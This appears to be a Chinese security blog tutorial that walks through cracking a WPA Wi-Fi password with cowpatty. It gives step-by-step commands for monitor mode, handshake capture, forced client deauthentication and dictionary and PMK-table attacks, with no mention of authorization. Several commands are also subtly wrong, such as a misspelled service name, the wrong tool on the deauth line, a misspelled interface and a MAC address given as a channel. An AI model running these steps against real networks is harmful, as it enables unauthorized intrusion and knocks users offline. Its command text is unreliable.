最新消息:

(六)无线渗透之Cowpatty破解

Kali Linux Eternal 2314浏览 0评论

首先还是老规矩,将不必要的进程关闭,并将网卡置入侦听模式。

service network-mannager stop

airmon-ng check kill

airmon-ng start wlan0

开始抓包并保存抓包数据。

airodump-ng wlan0mon –bssid ECxxxxxxxxB6 -c 11 -w wpa

此时当我用手机对WPA加密的AP进行连接后,如果抓包正常抓去了连接过程,则会在右上角显示 握手包抓取成功提示!这里我们可以看到并没有抓取到!这和无线网络本身不稳定有关。

为了成功抓取到握手包,我们可以采用 aireplay-ng 来强制让手机客户端与AP断开,进行重新连接!

airodump-ng -0 2 -a ECxxxxxxxxxB6 -c 68xxxxxxxxAA waln0mon

这里我们使其进行了两次重连。

我们回到抓包界面,此时我们可以看到已经成功抓取到握手信息。

拿到了握手包后,下面我们就可以正式开始破解了。

cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi

我们看到密码也成功被破解 Password!

同样Cowpatty支持生成PMK的hash值的表,来达到破解速度的提高!

genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi

利用生成的PMKHASH来进行无线破解。

cowpatty -r wpa-01.cap -d pmkhash -s kifi

相对于aircrack-ng 破解,cowpatty 更适合对一个固定目标的AP进行破解,否则重复生成PMKHASH并没有任何优势!

原创文章,转载请注明来源!即刻安全(secist.com)

文章地址:http://www.secist.com/?p=72&preview=true

转载请注明:即刻安全 » (六)无线渗透之Cowpatty破解

您必须 登录 才能发表评论!



合作伙伴